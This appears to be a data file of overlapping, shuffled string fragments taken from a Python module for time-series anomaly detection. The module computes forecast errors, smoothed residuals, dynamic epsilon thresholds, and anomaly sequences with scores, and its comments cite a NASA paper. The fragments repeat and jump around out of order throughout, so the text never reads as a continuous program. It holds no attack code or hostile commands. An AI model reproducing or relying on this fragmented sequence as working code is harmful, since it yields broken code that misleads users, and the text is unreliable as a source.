"if i not in anomaly_indices: max_error_below_e = smoothed_errors[i] # group anomalies into continuous",
"batch_size * smoothing_percent) moving_avg = [] for i in range(len(errors)): left_window = i",
"mu = np.mean(window_smoothed_errors) smoothed_errors_inv = [mu + (mu - e) for e in",
"g[0] == g[-1]] mean_perc_decrease = (mu - np.mean(below_epsilon)) / mu sd_perc_decrease = (sigma",
"of 0.5 on the range that the NASA paper found to be good",
"in anomaly_indices: max_error_below_e = smoothed_errors[i] # group anomalies into continuous sequences anomaly_indices =",
"mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) max_epsilon = 0 sd_threshold = sd_limit #",
"not in anomaly_indices: max_error_below_e = smoothed_errors[i] # group anomalies into continuous sequences anomaly_indices",
"we get the inverse by flipping around the mean mu = np.mean(window_smoothed_errors) smoothed_errors_inv",
"* batch_size) + (i * batch_size) if i == num_windows + 1: curr_index",
"sd_threshold def get_anomalies(smoothed_errors, y_true, z, window, all_anomalies, error_buffer): \"\"\" Helper method to get",
"e_seq[1]) ]) anomalies_scores.append(score) return anomaly_sequences, anomalies_scores def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0): \"\"\"Helper method for",
"by: https://arxiv.org/pdf/1802.04431.pdf def get_forecast_errors(y_hat, y_true, window_size=5, batch_size=30, smoothing_percent=0.05, smoothed=True): \"\"\" Calculates the forecasting",
"0: sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True) if max_error_below_e > 0: smoothed_errors_max.append(max_error_below_e) indices_remove",
"anomaly_indices: if (i - j) > minimum_index: anomaly_indices.append(i - j) # get all",
"max_error_below_e and adjusted_index not in all_anomalies: if i not in anomaly_indices: max_error_below_e =",
"for group in mit.consecutive_groups(above_epsilon)] above_sequences = [(g[0], g[-1]) for g in groups if",
"0: continue # generate sequences above_epsilon = sorted(list(set(above_epsilon))) groups = [list(group) for group",
"(list): true values. len(y_hat)==len(y_true). window_size (int): batch_size (int): smoothing_percent (float): smoothed (bool): whether",
"j) # get all the errors that are below epsilon and which #",
"sequences MIN_PERCENT_DECREASE = 0.05 e_seq_max, smoothed_errors_max = [], [] for error_seq in e_seq:",
"# min accepted perc decrease btwn max errors in anomalous sequences MIN_PERCENT_DECREASE =",
"sigma epsilon = (mean_perc_decrease + sd_perc_decrease) /\\ (len(above_sequences)**2 + len(above_epsilon)) # update the",
"error_seq in e_seq: if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0: sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True)",
"as anomalies to process them for i in range(len(smoothed_errors)): adjusted_index = i +",
"[abs(y_h - y_t) for y_h, y_t in zip(y_hat, y_true)] if not smoothed: return",
"size (%s) larger than y_true (len=%s).\" % (batch_size, len(y_true))) num_windows = int((len(y_true) -",
"minimum_index: anomaly_indices.append(i - j) # get all the errors that are below epsilon",
"< len(smoothed_errors_max) - 1: delta = smoothed_errors_max[i] - smoothed_errors_max[i + 1] perc_change =",
"minimum_index = 100 # have a cutoff value for anomalies until model is",
"- np.mean(below_epsilon)) / mu sd_perc_decrease = (sigma - np.std(below_epsilon)) / sigma epsilon =",
"- y_t) for y_h, y_t in zip(y_hat, y_true)] if not smoothed: return errors",
"generate \"scores\" for anomalies based on the max distance from epsilon for each",
"e in window_smoothed_errors] epsilon_inv, sd_inv = compute_threshold(smoothed_errors_inv, error_buffer) inv_anom_indices = get_anomalies( smoothed_errors_inv, window_y_true,",
"(float): smoothed (bool): whether the returned errors should be smoothed with EWMA. Returns:",
"* batch_size curr_index = (window_size * batch_size) + (i * batch_size) if i",
"mu sd_perc_decrease = (sigma - np.std(below_epsilon)) / sigma epsilon = (mean_perc_decrease + sd_perc_decrease)",
"100 # have a cutoff value for anomalies until model is trained enough",
"anomaly_indices: for error_seq in e_seq: if i >= error_seq[0] and i <= error_seq[1]:",
"[] for i in range(num_windows + 1): prev_index = i * batch_size curr_index",
"values representing the # number of standard deviations above mean(smoothed_errors) # here we",
"mean_perc_decrease = (mu - np.mean(below_epsilon)) / mu sd_perc_decrease = (sigma - np.std(below_epsilon)) /",
"epsilon > max_epsilon: sd_threshold = z max_epsilon = epsilon # sd_threshold can be",
"in all_anomalies: if i not in anomaly_indices: max_error_below_e = smoothed_errors[i] # group anomalies",
"in zip(y_hat, y_true)] if not smoothed: return errors historical_error_window = int(window_size * batch_size",
"max_error_below_e = smoothed_errors[i] # group anomalies into continuous sequences anomaly_indices = sorted(list(set(anomaly_indices))) groups",
"specified by user. \"\"\" errors = [abs(y_h - y_t) for y_h, y_t in",
"above_epsilon and (i + j) < len(smoothed_errors): above_epsilon.append(i + j) if (i -",
"if (i + j) not in above_epsilon and (i + j) < len(smoothed_errors):",
"prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices): \"\"\" Helper method that removes anomalies which don't meet",
"anomaly_sequences: denominator = np.mean(smoothed_errors) + np.std(smoothed_errors) score = max([ abs(smoothed_errors[x] - epsilon) /",
"below_epsilon, below_indices, above_epsilon = [], [], [] for i in range(len(smoothed_errors)): e =",
"len(errors_seq) > 0: anomaly_indices = prune_anomalies( errors_seq, smoothed_errors, max_error_below_e, anomaly_indices ) return anomaly_indices",
"above_epsilon values are anomalies for j in range(0, error_buffer): if (i + j)",
"in anomaly_indices: for error_seq in e_seq: if i >= error_seq[0] and i <=",
"standard deviations above mean(smoothed_errors) # here we iterate in increments of 0.5 on",
"(threshold) for anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) max_epsilon = 0",
"in mit.consecutive_groups(above_epsilon)] above_sequences = [(g[0], g[-1]) for g in groups if not g[0]",
"Returns: (list): error residuals. Smoothed if specified by user. \"\"\" errors = [abs(y_h",
"errors = [abs(y_h - y_t) for y_h, y_t in zip(y_hat, y_true)] if not",
"y_true[prev_index:curr_index] epsilon, sd_threshold = compute_threshold(window_smoothed_errors, error_buffer) window_anom_indices = get_anomalies( window_smoothed_errors, window_y_true, sd_threshold, i,",
"inv_anom_indices)) anomalies_indices.extend([i_a + i * batch_size for i_a in window_anom_indices]) # group anomalies",
"are anomalies for j in range(0, error_buffer): if (i + j) not in",
"num_windows + 1: curr_index = len(y_true) window_smoothed_errors = smoothed_errors[prev_index:curr_index] window_y_true = y_true[prev_index:curr_index] epsilon,",
"j) >= 0: above_epsilon.append(i - j) if len(above_epsilon) == 0: continue # generate",
"+ j) if (i - j) not in above_epsilon and (i - j)",
"= upper_percentile - lower_percentile minimum_index = 100 # have a cutoff value for",
"identified as anomalies to process them for i in range(len(smoothed_errors)): adjusted_index = i",
"user. \"\"\" errors = [abs(y_h - y_t) for y_h, y_t in zip(y_hat, y_true)]",
"g[-1]] mean_perc_decrease = (mu - np.mean(below_epsilon)) / mu sd_perc_decrease = (sigma - np.std(below_epsilon))",
"anomalies based on the max distance from epsilon for each sequence anomalies_scores =",
"of standard deviations above mean(smoothed_errors) # here we iterate in increments of 0.5",
"range(error_buffer): if (i + j) < len(smoothed_errors) and (i + j) not in",
"and (i - j) not in anomaly_indices: if (i - j) > minimum_index:",
"window_smoothed_errors, window_y_true, sd_threshold, i, anomalies_indices, error_buffer ) # get anomalies from inverse of",
"batch_size (int): smoothing_percent (float): smoothed (bool): whether the returned errors should be smoothed",
"raise ValueError(\"Window size (%s) larger than y_true (len=%s).\" % (batch_size, len(y_true))) num_windows =",
"+ np.std(smoothed_errors) score = max([ abs(smoothed_errors[x] - epsilon) / denominator for x in",
"testing multiple Zs. # z is drawn from an ordered set of positive",
"[mu + (mu - e) for e in window_smoothed_errors] epsilon_inv, sd_inv = compute_threshold(smoothed_errors_inv,",
"as np # Methods to do dynamic error thresholding on timeseries data #",
"Smoothed if specified by user. \"\"\" errors = [abs(y_h - y_t) for y_h,",
"for i in range(len(smoothed_errors)): adjusted_index = i + (window - 1) * batch_size",
"and which # weren't identified as anomalies to process them for i in",
"in mit.consecutive_groups(anomalies_indices)] anomaly_sequences = [(g[0], g[-1]) for g in anomalies_groups if not g[0]",
"Helper method that removes anomalies which don't meet a minimum separation from next",
"NASA paper found to be good for z in np.arange(2.5, sd_limit, 0.5): epsilon",
"get the inverse by flipping around the mean mu = np.mean(window_smoothed_errors) smoothed_errors_inv =",
"j) > minimum_index: anomaly_indices.append(i - j) # get all the errors that are",
"group_consecutive_anomalies(smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies, batch_size=30): upper_percentile, lower_percentile = np.percentile(y_true, [95, 5])",
"flipping around the mean mu = np.mean(window_smoothed_errors) smoothed_errors_inv = [mu + (mu -",
"Calculates the epsilon (threshold) for anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors)",
"j) > minimum_index: anomaly_indices.append(i + j) if (i - j) < len(smoothed_errors) and",
"EWMA. Args: y_hat (list): forecasted values. len(y_hat)==len(y_true). y_true (list): true values. len(y_hat)==len(y_true). window_size",
"= [(g[0], g[-1]) for g in groups if not g[0] == g[-1]] mean_perc_decrease",
"Extracts anomalies from the errors. Args: y_true (): smoothed_errors (): window_size (int): batch_size",
"to be good for z in np.arange(2.5, sd_limit, 0.5): epsilon = mu +",
"> 0: anomaly_indices = prune_anomalies( errors_seq, smoothed_errors, max_error_below_e, anomaly_indices ) return anomaly_indices def",
"sd_inv = compute_threshold(smoothed_errors_inv, error_buffer) inv_anom_indices = get_anomalies( smoothed_errors_inv, window_y_true, sd_inv, i, anomalies_indices, len(y_true)",
"in window_anom_indices]) # group anomalies anomalies_indices = sorted(list(set(anomalies_indices))) anomalies_groups = [list(group) for group",
"in range(0, error_buffer): if (i + j) not in above_epsilon and (i +",
"# we get the inverse by flipping around the mean mu = np.mean(window_smoothed_errors)",
"for anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) max_epsilon = 0 sd_threshold",
"len(smoothed_errors) and (i + j) not in anomaly_indices: if (i + j) >",
"from an ordered set of positive values representing the # number of standard",
"not in above_epsilon and (i - j) >= 0: above_epsilon.append(i - j) if",
"dynamic error thresholding on timeseries data # Implementation inspired by: https://arxiv.org/pdf/1802.04431.pdf def get_forecast_errors(y_hat,",
"1] perc_change = delta / smoothed_errors_max[i] if perc_change < MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for index",
"window_smoothed_errors = smoothed_errors[prev_index:curr_index] window_y_true = y_true[prev_index:curr_index] epsilon, sd_threshold = compute_threshold(window_smoothed_errors, error_buffer) window_anom_indices =",
"range(len(smoothed_errors)): e = smoothed_errors[i] if e < epsilon: # save to compute delta",
"return anomaly_indices def group_consecutive_anomalies(smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies, batch_size=30): upper_percentile, lower_percentile =",
"do dynamic error thresholding on timeseries data # Implementation inspired by: https://arxiv.org/pdf/1802.04431.pdf def",
"- np.std(below_epsilon)) / sigma epsilon = (mean_perc_decrease + sd_perc_decrease) /\\ (len(above_sequences)**2 + len(above_epsilon))",
"[] for i in range(len(smoothed_errors_max)): if i < len(smoothed_errors_max) - 1: delta =",
"sequences above_epsilon = sorted(list(set(above_epsilon))) groups = [list(group) for group in mit.consecutive_groups(above_epsilon)] above_sequences =",
"with EWMA. Returns: (list): error residuals. Smoothed if specified by user. \"\"\" errors",
"if not smoothed: return errors historical_error_window = int(window_size * batch_size * smoothing_percent) moving_avg",
"for anomalies until model is trained enough anomaly_indices = [] max_error_below_e = 0",
"= 0 for i in range(len(smoothed_errors)): if smoothed_errors[i] <= epsilon or smoothed_errors[i] <=",
"g[-1]] # generate \"scores\" for anomalies based on the max distance from epsilon",
"moving_avg = [] for i in range(len(errors)): left_window = i - historical_error_window right_window",
"0 sd_threshold = sd_limit # The treshold is determined dynamically by testing multiple",
"= prune_anomalies( errors_seq, smoothed_errors, max_error_below_e, anomaly_indices ) return anomaly_indices def group_consecutive_anomalies(smoothed_errors, epsilon, y_true,",
"= [mu + (mu - e) for e in window_smoothed_errors] epsilon_inv, sd_inv =",
"[95, 5]) accepted_range = upper_percentile - lower_percentile minimum_index = 100 # have a",
"import more_itertools as mit import numpy as np # Methods to do dynamic",
"i in range(len(smoothed_errors)): e = smoothed_errors[i] if e < epsilon: # save to",
"(i - j) > minimum_index: anomaly_indices.append(i - j) # get all the errors",
"the range that the NASA paper found to be good for z in",
"# Methods to do dynamic error thresholding on timeseries data # Implementation inspired",
"meet a minimum separation from next anomaly. \"\"\" # min accepted perc decrease",
"get_anomalies( smoothed_errors_inv, window_y_true, sd_inv, i, anomalies_indices, len(y_true) ) anomalies_indices = list(set(anomalies_indices + inv_anom_indices))",
"in range(e_seq[0], e_seq[1]) ]) anomalies_scores.append(score) return anomaly_sequences, anomalies_scores def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0): \"\"\"Helper",
"to epsilon errors_seq, anomaly_indices, max_error_below_e = group_consecutive_anomalies( smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies",
"g[-1]) for g in groups if g[0] != g[-1]] return e_seq, anomaly_indices, max_error_below_e",
"for x in range(e_seq[0], e_seq[1]) ]) anomalies_scores.append(score) return anomaly_sequences, anomalies_scores def compute_threshold(smoothed_errors, error_buffer,",
"update the largest epsilon we've seen so far if epsilon > max_epsilon: sd_threshold",
"smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True) if max_error_below_e > 0: smoothed_errors_max.append(max_error_below_e) indices_remove = [] for i in",
"< len(smoothed_errors) and (i + j) not in anomaly_indices: if (i + j)",
"i in anomaly_indices: for error_seq in e_seq: if i >= error_seq[0] and i",
"anomaly_sequences, anomalies_scores def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0): \"\"\"Helper method for `extract_anomalies` method. Calculates the",
"error_buffer, sd_limit=12.0): \"\"\"Helper method for `extract_anomalies` method. Calculates the epsilon (threshold) for anomalies.",
"def get_anomalies(smoothed_errors, y_true, z, window, all_anomalies, error_buffer): \"\"\" Helper method to get anomalies.",
"epsilon or smoothed_errors[i] <= 0.05 * accepted_range: # not an anomaly continue for",
"* batch_size for i_a in window_anom_indices]) # group anomalies anomalies_indices = sorted(list(set(anomalies_indices))) anomalies_groups",
"them for i in range(len(smoothed_errors)): adjusted_index = i + (window - 1) *",
"method for `extract_anomalies` method. Calculates the epsilon (threshold) for anomalies. \"\"\" mu =",
"group in mit.consecutive_groups(anomalies_indices)] anomaly_sequences = [(g[0], g[-1]) for g in anomalies_groups if not",
"mit.consecutive_groups(above_epsilon)] above_sequences = [(g[0], g[-1]) for g in groups if not g[0] ==",
"for e in window_smoothed_errors] epsilon_inv, sd_inv = compute_threshold(smoothed_errors_inv, error_buffer) inv_anom_indices = get_anomalies( smoothed_errors_inv,",
"[], [] for i in range(len(smoothed_errors)): e = smoothed_errors[i] if e < epsilon:",
"anomalies_scores def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0): \"\"\"Helper method for `extract_anomalies` method. Calculates the epsilon",
"= compute_threshold(smoothed_errors_inv, error_buffer) inv_anom_indices = get_anomalies( smoothed_errors_inv, window_y_true, sd_inv, i, anomalies_indices, len(y_true) )",
"# these are important for epsilon calculation below_epsilon.append(e) below_indices.append(i) if e > epsilon:",
"j in range(0, error_buffer): if (i + j) not in above_epsilon and (i",
"> 0: smoothed_errors_max.append(max_error_below_e) indices_remove = [] for i in range(len(smoothed_errors_max)): if i <",
"= z max_epsilon = epsilon # sd_threshold can be multiplied by sigma to",
"\"scores\" for anomalies based on the max distance from epsilon for each sequence",
"(i + j) > minimum_index: anomaly_indices.append(i + j) if (i - j) <",
"np.mean(smoothed_errors) sigma = np.std(smoothed_errors) epsilon = mu + (z * sigma) # compare",
"anomalies from the errors. Args: y_true (): smoothed_errors (): window_size (int): batch_size (int):",
"i, anomalies_indices, len(y_true) ) anomalies_indices = list(set(anomalies_indices + inv_anom_indices)) anomalies_indices.extend([i_a + i *",
"forecasting error for two arrays of data. If smoothed errors desired, runs EWMA.",
"y_t in zip(y_hat, y_true)] if not smoothed: return errors historical_error_window = int(window_size *",
"anomalies for j in range(0, error_buffer): if (i + j) not in above_epsilon",
"determined dynamically by testing multiple Zs. # z is drawn from an ordered",
"len(smoothed_errors): above_epsilon.append(i + j) if (i - j) not in above_epsilon and (i",
"be multiplied by sigma to get epsilon return max_epsilon, sd_threshold def get_anomalies(smoothed_errors, y_true,",
"max_error_below_e = group_consecutive_anomalies( smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies ) if len(errors_seq) >",
"sorted(list(set(anomalies_indices))) anomalies_groups = [list(group) for group in mit.consecutive_groups(anomalies_indices)] anomaly_sequences = [(g[0], g[-1]) for",
"mit.consecutive_groups(anomaly_indices)] e_seq = [(g[0], g[-1]) for g in groups if g[0] != g[-1]]",
"thresholding on timeseries data # Implementation inspired by: https://arxiv.org/pdf/1802.04431.pdf def get_forecast_errors(y_hat, y_true, window_size=5,",
"to get anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) epsilon = mu",
"sd_threshold = z max_epsilon = epsilon # sd_threshold can be multiplied by sigma",
"all_anomalies, batch_size=30): upper_percentile, lower_percentile = np.percentile(y_true, [95, 5]) accepted_range = upper_percentile - lower_percentile",
"in sorted(indices_remove, reverse=True): del e_seq[index] pruned_indices = [] for i in anomaly_indices: for",
"in the implementation of NASA paper but # wasn't referenced in the paper",
"Args: y_true (): smoothed_errors (): window_size (int): batch_size (int): error_buffer (int): Returns: \"\"\"",
"above_epsilon = sorted(list(set(above_epsilon))) groups = [list(group) for group in mit.consecutive_groups(above_epsilon)] above_sequences = [(g[0],",
"calculation below_epsilon.append(e) below_indices.append(i) if e > epsilon: # above_epsilon values are anomalies for",
"if perc_change < MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for index in sorted(indices_remove, reverse=True): del e_seq[index] pruned_indices",
"= (mean_perc_decrease + sd_perc_decrease) /\\ (len(above_sequences)**2 + len(above_epsilon)) # update the largest epsilon",
"historical_error_window = int(window_size * batch_size * smoothing_percent) moving_avg = [] for i in",
"0: left_window = 0 if right_window > len(errors): right_window = len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return",
"= i * batch_size curr_index = (window_size * batch_size) + (i * batch_size)",
"for j in range(0, error_buffer): if (i + j) not in above_epsilon and",
"= sd_limit # The treshold is determined dynamically by testing multiple Zs. #",
"smoothed_errors_max.append(max_error_below_e) indices_remove = [] for i in range(len(smoothed_errors_max)): if i < len(smoothed_errors_max) -",
"window_size: raise ValueError(\"Window size (%s) larger than y_true (len=%s).\" % (batch_size, len(y_true))) num_windows",
"not smoothed: return errors historical_error_window = int(window_size * batch_size * smoothing_percent) moving_avg =",
"+ (mu - e) for e in window_smoothed_errors] epsilon_inv, sd_inv = compute_threshold(smoothed_errors_inv, error_buffer)",
"right_window = i + historical_error_window + 1 if left_window < 0: left_window =",
"right_window > len(errors): right_window = len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg def extract_anomalies(y_true, smoothed_errors, window_size,",
"multiplied by sigma to get epsilon return max_epsilon, sd_threshold def get_anomalies(smoothed_errors, y_true, z,",
"# here we iterate in increments of 0.5 on the range that the",
"above_epsilon.append(i + j) if (i - j) not in above_epsilon and (i -",
"# have a cutoff value for anomalies until model is trained enough anomaly_indices",
"np.mean(window_smoothed_errors) smoothed_errors_inv = [mu + (mu - e) for e in window_smoothed_errors] epsilon_inv,",
"smoothed_errors[i] if e < epsilon: # save to compute delta mean and delta",
"- 1: delta = smoothed_errors_max[i] - smoothed_errors_max[i + 1] perc_change = delta /",
"= [] for i in anomaly_indices: for error_seq in e_seq: if i >=",
"< MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for index in sorted(indices_remove, reverse=True): del e_seq[index] pruned_indices = []",
"if specified by user. \"\"\" errors = [abs(y_h - y_t) for y_h, y_t",
"\"\"\" errors = [abs(y_h - y_t) for y_h, y_t in zip(y_hat, y_true)] if",
"def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0): \"\"\"Helper method for `extract_anomalies` method. Calculates the epsilon (threshold)",
"method. Calculates the epsilon (threshold) for anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma =",
"mu + (sigma * z) below_epsilon, below_indices, above_epsilon = [], [], [] for",
"group in mit.consecutive_groups(above_epsilon)] above_sequences = [(g[0], g[-1]) for g in groups if not",
"1) * batch_size if smoothed_errors[i] > max_error_below_e and adjusted_index not in all_anomalies: if",
"if right_window > len(errors): right_window = len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg def extract_anomalies(y_true, smoothed_errors,",
"+ i * batch_size for i_a in window_anom_indices]) # group anomalies anomalies_indices =",
"= sorted(list(set(anomaly_indices))) groups = [list(group) for group in mit.consecutive_groups(anomaly_indices)] e_seq = [(g[0], g[-1])",
"in anomaly_sequences: denominator = np.mean(smoothed_errors) + np.std(smoothed_errors) score = max([ abs(smoothed_errors[x] - epsilon)",
"error_buffer): \"\"\" Extracts anomalies from the errors. Args: y_true (): smoothed_errors (): window_size",
"if not g[0] == g[-1]] # generate \"scores\" for anomalies based on the",
"(i - j) not in above_epsilon and (i - j) >= 0: above_epsilon.append(i",
"len(y_hat)==len(y_true). y_true (list): true values. len(y_hat)==len(y_true). window_size (int): batch_size (int): smoothing_percent (float): smoothed",
"max_epsilon: sd_threshold = z max_epsilon = epsilon # sd_threshold can be multiplied by",
"epsilon = mu + (z * sigma) # compare to epsilon errors_seq, anomaly_indices,",
"= mu + (z * sigma) # compare to epsilon errors_seq, anomaly_indices, max_error_below_e",
") return anomaly_indices def group_consecutive_anomalies(smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies, batch_size=30): upper_percentile, lower_percentile",
"if e > epsilon: # above_epsilon values are anomalies for j in range(0,",
"trained enough anomaly_indices = [] max_error_below_e = 0 for i in range(len(smoothed_errors)): if",
"errors # This was done in the implementation of NASA paper but #",
"0: anomaly_indices = prune_anomalies( errors_seq, smoothed_errors, max_error_below_e, anomaly_indices ) return anomaly_indices def group_consecutive_anomalies(smoothed_errors,",
"len(above_epsilon) == 0: continue # generate sequences above_epsilon = sorted(list(set(above_epsilon))) groups = [list(group)",
"j) not in above_epsilon and (i - j) >= 0: above_epsilon.append(i - j)",
"epsilon, y_true, error_buffer, window, all_anomalies ) if len(errors_seq) > 0: anomaly_indices = prune_anomalies(",
"= (sigma - np.std(below_epsilon)) / sigma epsilon = (mean_perc_decrease + sd_perc_decrease) /\\ (len(above_sequences)**2",
"anomalies_indices = list(set(anomalies_indices + inv_anom_indices)) anomalies_indices.extend([i_a + i * batch_size for i_a in",
"that the NASA paper found to be good for z in np.arange(2.5, sd_limit,",
"+ 1): prev_index = i * batch_size curr_index = (window_size * batch_size) +",
"anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) max_epsilon = 0 sd_threshold =",
"e_seq: if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0: sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True) if max_error_below_e",
"(): window_size (int): batch_size (int): error_buffer (int): Returns: \"\"\" if len(y_true) <= batch_size",
"\"\"\" Extracts anomalies from the errors. Args: y_true (): smoothed_errors (): window_size (int):",
"not g[0] == g[-1]] mean_perc_decrease = (mu - np.mean(below_epsilon)) / mu sd_perc_decrease =",
"lower_percentile = np.percentile(y_true, [95, 5]) accepted_range = upper_percentile - lower_percentile minimum_index = 100",
"get all the errors that are below epsilon and which # weren't identified",
"for group in mit.consecutive_groups(anomaly_indices)] e_seq = [(g[0], g[-1]) for g in groups if",
"smoothed_errors_max[i] - smoothed_errors_max[i + 1] perc_change = delta / smoothed_errors_max[i] if perc_change <",
"/ sigma epsilon = (mean_perc_decrease + sd_perc_decrease) /\\ (len(above_sequences)**2 + len(above_epsilon)) # update",
"perc_change = delta / smoothed_errors_max[i] if perc_change < MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for index in",
"denominator for x in range(e_seq[0], e_seq[1]) ]) anomalies_scores.append(score) return anomaly_sequences, anomalies_scores def compute_threshold(smoothed_errors,",
"an ordered set of positive values representing the # number of standard deviations",
"in range(error_buffer): if (i + j) < len(smoothed_errors) and (i + j) not",
"error_buffer) window_anom_indices = get_anomalies( window_smoothed_errors, window_y_true, sd_threshold, i, anomalies_indices, error_buffer ) # get",
"indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for index in sorted(indices_remove, reverse=True): del e_seq[index] pruned_indices = [] for i",
"\"\"\"Helper method for `extract_anomalies` method. Calculates the epsilon (threshold) for anomalies. \"\"\" mu",
"a minimum separation from next anomaly. \"\"\" # min accepted perc decrease btwn",
"anomaly. \"\"\" # min accepted perc decrease btwn max errors in anomalous sequences",
"[] for i in anomaly_indices: for error_seq in e_seq: if i >= error_seq[0]",
"y_t) for y_h, y_t in zip(y_hat, y_true)] if not smoothed: return errors historical_error_window",
"above_sequences = [(g[0], g[-1]) for g in groups if not g[0] == g[-1]]",
"== num_windows + 1: curr_index = len(y_true) window_smoothed_errors = smoothed_errors[prev_index:curr_index] window_y_true = y_true[prev_index:curr_index]",
"e_seq, anomaly_indices, max_error_below_e def prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices): \"\"\" Helper method that removes",
"[] for i in range(len(errors)): left_window = i - historical_error_window right_window = i",
"of smoothed errors # This was done in the implementation of NASA paper",
"above_epsilon.append(i - j) if len(above_epsilon) == 0: continue # generate sequences above_epsilon =",
"* smoothing_percent) moving_avg = [] for i in range(len(errors)): left_window = i -",
"upper_percentile - lower_percentile minimum_index = 100 # have a cutoff value for anomalies",
"smoothed_errors_max[i + 1] perc_change = delta / smoothed_errors_max[i] if perc_change < MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i]))",
"[list(group) for group in mit.consecutive_groups(above_epsilon)] above_sequences = [(g[0], g[-1]) for g in groups",
"+ j) < len(smoothed_errors): above_epsilon.append(i + j) if (i - j) not in",
"in anomaly_indices: if (i + j) > minimum_index: anomaly_indices.append(i + j) if (i",
"(i * batch_size) if i == num_windows + 1: curr_index = len(y_true) window_smoothed_errors",
"(list): error residuals. Smoothed if specified by user. \"\"\" errors = [abs(y_h -",
"np.std(smoothed_errors) epsilon = mu + (z * sigma) # compare to epsilon errors_seq,",
"sd_perc_decrease) /\\ (len(above_sequences)**2 + len(above_epsilon)) # update the largest epsilon we've seen so",
"max distance from epsilon for each sequence anomalies_scores = [] for e_seq in",
"j) if (i - j) not in above_epsilon and (i - j) >=",
"in increments of 0.5 on the range that the NASA paper found to",
"\"\"\" Helper method that removes anomalies which don't meet a minimum separation from",
"good for z in np.arange(2.5, sd_limit, 0.5): epsilon = mu + (sigma *",
"for j in range(error_buffer): if (i + j) < len(smoothed_errors) and (i +",
"but # wasn't referenced in the paper # we get the inverse by",
"sd_perc_decrease = (sigma - np.std(below_epsilon)) / sigma epsilon = (mean_perc_decrease + sd_perc_decrease) /\\",
"1: curr_index = len(y_true) window_smoothed_errors = smoothed_errors[prev_index:curr_index] window_y_true = y_true[prev_index:curr_index] epsilon, sd_threshold =",
"= [list(group) for group in mit.consecutive_groups(anomalies_indices)] anomaly_sequences = [(g[0], g[-1]) for g in",
"+ (i * batch_size) if i == num_windows + 1: curr_index = len(y_true)",
"+ len(above_epsilon)) # update the largest epsilon we've seen so far if epsilon",
"z, window, all_anomalies, error_buffer): \"\"\" Helper method to get anomalies. \"\"\" mu =",
"def get_forecast_errors(y_hat, y_true, window_size=5, batch_size=30, smoothing_percent=0.05, smoothed=True): \"\"\" Calculates the forecasting error for",
"def extract_anomalies(y_true, smoothed_errors, window_size, batch_size, error_buffer): \"\"\" Extracts anomalies from the errors. Args:",
"positive values representing the # number of standard deviations above mean(smoothed_errors) # here",
"data # Implementation inspired by: https://arxiv.org/pdf/1802.04431.pdf def get_forecast_errors(y_hat, y_true, window_size=5, batch_size=30, smoothing_percent=0.05, smoothed=True):",
"0 if right_window > len(errors): right_window = len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg def extract_anomalies(y_true,",
"y_true, error_buffer, window, all_anomalies ) if len(errors_seq) > 0: anomaly_indices = prune_anomalies( errors_seq,",
"= list(set(anomalies_indices + inv_anom_indices)) anomalies_indices.extend([i_a + i * batch_size for i_a in window_anom_indices])",
"mean(smoothed_errors) # here we iterate in increments of 0.5 on the range that",
"j) if (i - j) < len(smoothed_errors) and (i - j) not in",
"== 0: continue # generate sequences above_epsilon = sorted(list(set(above_epsilon))) groups = [list(group) for",
"increments of 0.5 on the range that the NASA paper found to be",
"for two arrays of data. If smoothed errors desired, runs EWMA. Args: y_hat",
"> 0: sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True) if max_error_below_e > 0: smoothed_errors_max.append(max_error_below_e)",
"on timeseries data # Implementation inspired by: https://arxiv.org/pdf/1802.04431.pdf def get_forecast_errors(y_hat, y_true, window_size=5, batch_size=30,",
"done in the implementation of NASA paper but # wasn't referenced in the",
"https://arxiv.org/pdf/1802.04431.pdf def get_forecast_errors(y_hat, y_true, window_size=5, batch_size=30, smoothing_percent=0.05, smoothed=True): \"\"\" Calculates the forecasting error",
"(z * sigma) # compare to epsilon errors_seq, anomaly_indices, max_error_below_e = group_consecutive_anomalies( smoothed_errors,",
